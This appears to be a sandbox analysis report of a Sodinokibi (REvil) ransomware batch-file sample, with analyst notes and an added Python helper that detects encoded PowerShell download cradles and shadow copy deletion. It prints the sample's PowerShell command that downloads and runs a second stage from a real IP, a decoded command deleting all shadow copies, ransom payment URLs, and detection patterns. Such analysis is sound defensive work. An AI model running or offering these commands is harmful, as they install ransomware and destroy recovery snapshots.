Analysis
max time kernel: 132s
max time network: 138s
platform: windows7_x64
resource: win7v200430
submitted: 15-05-2020 19:19
Static task: static1
Behavioral task: behavioral1
  Sample: 74b8e8ad8fe5aea82ec95a707e3c2b94.bat
  Resource: win7v200430
Behavioral task: behavioral2
  Sample: 74b8e8ad8fe5aea82ec95a707e3c2b94.bat
  Resource: win10v200430
General
Target: 74b8e8ad8fe5aea82ec95a707e3c2b94.bat
Size: 214B
MD5: 220dc0fc858c664ba5223cbab7e4b312
SHA1: 94f095bd648c7c3f4845e3c419b74baa7662f2ae
SHA256: 94d89a44ea5da3649df80f6898cb30415f2df92c0060d36d5f9afa3806862a2a
SHA512: 119c413acb39f51f4d668c5bc48793f60b91717e1623e22d666221c26e78cfa3667e7aa2141b26e15aa3936d86ba498ae280decd9889a77f8706459d0f295772
Malware Config
Extracted: http://185.103.242.78/pastes/74b8e8ad8fe5aea82ec95a707e3c2b94
Extracted: C:\37e3wa1803-readme.txt
  Family: sodinokibi
  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/14D2FFAA80AE78FE
  http://decryptor.cc/14D2FFAA80AE78FE
Note: the first URL is the second-stage download location used by the .bat; the ransom note supplies the Tor and clearnet payment URLs, both carrying the same victim identifier 14D2FFAA80AE78FE. The note name follows this family's <extension>-readme.txt pattern, 37e3wa1803 being the extension appended to encrypted files in this run; copies of the note are dropped into the Program Files directories listed under Signatures.
Signatures

Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes: powershell.exe (PID 1060, 3 events); powershell.exe (PID 1764, 2 events)

Blacklisted process makes network request (67 IoCs)
Processes: powershell.exe (PID 1060); network flows 1, 5, 7, 9, 11, 13, 14, 16, 17, 19, 20, 22, 24, 26, 27, 29, 31, 32, 34, 35, 37, 39, 41, 42, 44, 48, 50, 51, 54, 55, 57, 58, 60, 61, 63, 64, 66, 68, 69, 71, 73, 74, 76, 77, 79, 81, 83, 85, 87, 89, 90, 93, 94, 96, 98, 100, 102, 104, 106, 108, 109, 111, 112, 114

Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Processes: powershell.exe (PID 1060): Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\genfu65za5.bmp"

Drops file in System32 directory (1 IoC)
Processes: powershell.exe (PID 1060): File opened for modification C:\Windows\System32\CatRoot2\dberr.txt
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
Processes: powershell.exe (PID 1060)

Suspicious use of WriteProcessMemory (5 IoCs)
Processes:
  PID 280 cmd.exe wrote to memory of PID 1060 powershell.exe
  PID 1060 powershell.exe wrote to memory of PID 1764 powershell.exe (4 events)
Note: a parent writing into a freshly created child is part of normal process creation on Windows; these entries document the cmd.exe to powershell.exe to powershell.exe chain rather than injection into an unrelated process.

Suspicious use of AdjustPrivilegeToken (7 IoCs)
Processes:
  powershell.exe (PID 1060): Token: SeDebugPrivilege (2 events), Token: SeTakeOwnershipPrivilege
  powershell.exe (PID 1764): Token: SeDebugPrivilege
  vssvc.exe (PID 1604): Token: SeBackupPrivilege, Token: SeRestorePrivilege, Token: SeAuditPrivilege
Drops file in Program Files directory (26 IoCs)
Processes: powershell.exe (PID 1060)
  File created: \??\c:\program files\37e3wa1803-readme.txt
  File created: \??\c:\program files (x86)\37e3wa1803-readme.txt
  File created: \??\c:\program files\microsoft sql server compact edition\37e3wa1803-readme.txt
  File created: \??\c:\program files\microsoft sql server compact edition\v3.5\37e3wa1803-readme.txt
  File created: \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\37e3wa1803-readme.txt
  File opened for modification: \??\c:\program files\CloseCompare.001
  File opened for modification: \??\c:\program files\SkipExpand.ttc
  File opened for modification: \??\c:\program files\ProtectRevoke.xla
  File opened for modification: \??\c:\program files\RedoRestart.asf
  File opened for modification: \??\c:\program files\SyncExit.TS
  File opened for modification: \??\c:\program files\WatchSync.vb
  File opened for modification: \??\c:\program files\ConvertFromCompare.aiff
  File opened for modification: \??\c:\program files\DebugConnect.shtml
  File opened for modification: \??\c:\program files\DenyAssert.3gp2
  File opened for modification: \??\c:\program files\MergePop.gif
  File opened for modification: \??\c:\program files\NewMount.3gpp
  File opened for modification: \??\c:\program files\UnblockExpand.dot
  File opened for modification: \??\c:\program files\WatchLimit.jpeg
  File opened for modification: \??\c:\program files\UseWait.mpeg
  File opened for modification: \??\c:\program files\CheckpointNew.pcx
  File opened for modification: \??\c:\program files\ClearUnlock.snd
  File opened for modification: \??\c:\program files\InitializeSubmit.vstm
  File opened for modification: \??\c:\program files\MountCopy.docx
  File opened for modification: \??\c:\program files\PushPop.MTS
  File opened for modification: \??\c:\program files\RegisterGet.mp4
  File opened for modification: \??\c:\program files\RenameSplit.gif
Note: the five "File created" entries are the ransom note being written into each directory walked; the 21 "opened for modification" entries are the sandbox's bait documents being opened for writing, consistent with in-place encryption.
Modifies system certificate store
Processes: powershell.exe (PID 1060)
  Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
  Set value (data): \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 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
  Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436
  Set value (data): \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 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
Note: entries under AuthRoot\Certificates are written by the Windows automatic root certificate update when a process first builds a TLS chain to a root not yet cached locally. Both thumbprints here belong to public roots (DAC9024F... is DST Root CA X3, A8985D3A... is DigiCert Global Root CA), so this signature reflects TLS connections made during the run, not the sample installing a trusted root of its own.
Enumerates connected drives (3 TTPs)

Modifies service (2 TTPs, 4 IoCs)
Processes: vssvc.exe (PID 1604)
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer
Note: these are the Volume Shadow Copy service's own diagnostic keys for its writers, created when the service starts to handle the shadow copy deletion issued by PID 1764; the sample does not modify the VSS service configuration itself.
Processes

C:\Windows\system32\cmd.exe (PID 280)
  cmd /c "C:\Users\Admin\AppData\Local\Temp\74b8e8ad8fe5aea82ec95a707e3c2b94.bat"
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1060, child of 280)
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/74b8e8ad8fe5aea82ec95a707e3c2b94');Invoke-ZUMTYKU;Start-Sleep -s 10000"
    Note: the 214-byte .bat is only a download cradle. It starts the 32-bit (SysWOW64) PowerShell, which fetches the second stage over plain HTTP, runs it in memory with IEX, calls Invoke-ZUMTYKU (not a built-in cmdlet, so it must be defined by the downloaded script), and then sleeps for 10000 seconds so the host process stays alive while the payload runs. Every signature attributed to PID 1060 is therefore the behaviour of the downloaded stage, and the only on-disk artefact of the first stage is the .bat itself.
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    - Sets desktop wallpaper using registry
    - Drops file in System32 directory
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken
    - Drops file in Program Files directory
    - Modifies system certificate store

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1764, child of 1060)
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      Decoded (-e takes Base64 of UTF-16LE text): Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
      Note: this deletes every Volume Shadow Copy through WMI so that files encrypted by the payload cannot be restored from local snapshots; it is the WMI equivalent of "vssadmin delete shadows /all". vssvc.exe (PID 1604) below is the Volume Shadow Copy service that carries out the deletion.
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\vssvc.exe (PID 1604)
  C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
  - Modifies service
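The following triage helper is an added example, not part of the sandbox report or of the sample. It decodes PowerShell -EncodedCommand payloads (Base64 of UTF-16LE text) and flags the two behaviours recorded in the process tree above, the IEX/DownloadString download cradle of PID 1060 and the shadow copy deletion of PID 1764. The two command lines are copied verbatim from the report; the rule names, the extra vssadmin/wmic patterns and the URL extraction are this example's own additions. Nothing here executes the commands or touches the network.

```python
"""Added triage helper; not part of the sandbox report or of the sample.

Decodes PowerShell -EncodedCommand payloads and flags an IEX/DownloadString
download cradle and Volume Shadow Copy deletion. The command lines below are
copied verbatim from the report; nothing here executes them.
"""
import base64
import binascii
import re

# Command lines of PID 1060 and PID 1764 exactly as recorded in the report.
REPORT_CMDLINES = {
    1060: (
        'C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe '
        '"IEX (New-Object System.Net.WebClient).DownloadString('
        "'http://185.103.242.78/pastes/74b8e8ad8fe5aea82ec95a707e3c2b94');"
        'Invoke-ZUMTYKU;Start-Sleep -s 10000"'
    ),
    1764: "powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==",
}

# powershell.exe accepts -EncodedCommand and the abbreviations -e, -ec and -enc;
# the argument is Base64 text, so only that alphabet is captured.
ENCODED_ARG = re.compile(r"(?i)(?<!\S)-e(?:c|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)")

# Detection rules (names chosen for this example). Each pattern is confined to
# one line of text, so a hit comes either from the raw command line or from the
# decoded payload, never from a mix of the two.
RULES = {
    "download_cradle": re.compile(
        r"(?i)(?:\bIEX\b|Invoke-Expression)[^\n]*?"
        r"(?:DownloadString|DownloadFile|DownloadData|Invoke-WebRequest|\biwr\b)"
    ),
    "shadow_copy_delete": re.compile(
        r"(?i)Win32_Shadowcopy[^\n]*\.Delete\(\)"
        r"|vssadmin(?:\.exe)?\s+delete\s+shadows"
        r"|wmic(?:\.exe)?\s+shadowcopy\s+delete"
    ),
}

URL_RE = re.compile(r"https?://[^\s'\"()]+")


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument, or None if absent or malformed."""
    m = ENCODED_ARG.search(cmdline)
    if m is None:
        return None
    try:
        # UTF-16LE needs an even byte count; odd-length or non-Base64 input is rejected.
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None  # leave malformed payloads for manual review


def triage(cmdline):
    """Classify one command line, matching the rules on the decoded payload as well."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    return {
        "decoded": decoded,
        "hits": sorted(name for name, rx in RULES.items() if rx.search(text)),
        "urls": URL_RE.findall(text),
    }


def triage_tree(cmdlines):
    """Run triage() over a {pid: cmdline} mapping such as REPORT_CMDLINES."""
    return {pid: triage(c) for pid, c in cmdlines.items()}


if __name__ == "__main__":
    for pid, result in triage_tree(REPORT_CMDLINES).items():
        print(pid, result["hits"], result["urls"], repr(result["decoded"]))
```

Matching on the decoded text is the point: the Base64 blob of PID 1764 contains none of the rule keywords, and a rule that only looks at raw command lines would miss the shadow copy deletion entirely. The decoder also covers the -EncodedCommand spelling and rejects odd-length or invalid Base64 instead of raising.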